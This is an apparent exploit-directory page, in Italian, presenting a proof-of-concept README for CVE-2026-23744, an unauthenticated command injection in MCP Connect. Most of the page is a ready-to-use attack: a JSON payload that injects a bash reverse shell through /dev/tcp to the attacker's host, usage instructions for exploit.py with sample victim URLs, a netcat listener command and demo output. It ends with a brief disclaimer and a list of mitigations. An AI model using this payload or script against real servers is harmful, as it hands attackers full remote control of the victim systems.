Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23744 — Proof-of-concept exploit per CVE-2026-23744, un'iniezione di comandi non autenticata in MCP Connect che porta a esecuzione remota di codice e reverse shell. | Kitploit
Strumenti/GitHubGitHub/cylock11/cve-2026-23744
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubcylock11/cve-2026-23744

CVE-2026-23744

Proof-of-concept exploit per CVE-2026-23744, un'iniezione di comandi non autenticata in MCP Connect che porta a esecuzione remota di codice e reverse shell.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23744 — MCP Connect RCE tramite Iniezione di Comandi Non Autenticata

Python Category Type License

⚠️ Disclaimer: Questo repository è solo a scopo educativo e di ricerca sulla sicurezza. L'uso di questo exploit contro sistemi senza autorizzazione esplicita è illegale. L'autore non si assume alcuna responsabilità per l'uso improprio di questo codice.


📌 Descrizione della Vulnerabilità

La vulnerabilità risiede nell'endpoint /api/mcp/connect, che consente a un attaccante non autenticato di registrare un server MCP (Model Context Protocol) arbitrario con una configurazione dannosa. Poiché non esiste alcuna validazione o sanitizzazione del campo command e dei relativi args, è possibile iniettare comandi del sistema operativo che vengono eseguiti direttamente sul server con i privilegi del processo web.

Ciò comporta una esecuzione remota di codice (RCE) che può essere sfruttata per ottenere una reverse shell sul sistema compromesso.


🧠 Dettagli Tecnici

CampoDettaglio
TipoRemote Code Execution (RCE)
VettoreRete (HTTP POST senza autenticazione)
Endpoint/api/mcp/connect
Gravità🔴 Critica
AutenticazioneNon richiesta
ImpattoControllo totale del server

Payload dannoso

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

Il server elabora questa configurazione e invoca il comando bash con gli argomenti forniti, stabilendo una connessione TCP inversa verso l'attaccante.


🛠️ Requisiti

  • Python 3.x
  • Le seguenti librerie:
root@kitploit:~
pip install requests termcolor

🚀 Utilizzo

root@kitploit:~
python3 exploit.py -l <LA_TUA_IP> -u <URL_OBIETTIVO>

Parametri

ParametroDescrizioneEsempio
-lLa tua IP (dove riceverai la shell)192.168.1.50
-uURL base dell'obiettivohttps://victim.com

Esempio completo

Terminale 1 — Listener:

root@kitploit:~
nc -nlvp 443

Terminale 2 — Exploit:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 Demo

root@kitploit:~
[-] Please, execute the following command in another terminal:

[+] nc -nlvp 443

[-] Press 'Enter' when the command has been executed...

[+] Sending attack request...

Una volta inviata la richiesta, il listener sulla porta 443 riceverà la connessione inversa con una shell interattiva del server compromesso.


🛡️ Mitigazione

  • Validare e sanificare tutti i campi del body in /api/mcp/connect prima di elaborarli.
  • Autenticare l'endpoint e limitarne l'accesso solo agli utenti con privilegi.
  • Non eseguire mai comandi di sistema direttamente a partire da input dell'utente.
  • Implementare una lista bianca dei comandi consentiti.
  • Applicare il principio del minimo privilegio al processo del server web.

📁 Struttura del Repository

root@kitploit:~
.
├── exploit.py       # Script principale dell'exploit
└── README.md        # Questo file

👤 Autore

Sviluppato a scopo di ricerca sulla sicurezza offensiva da Jorge Arana Fedriani.

Scarica lo strumento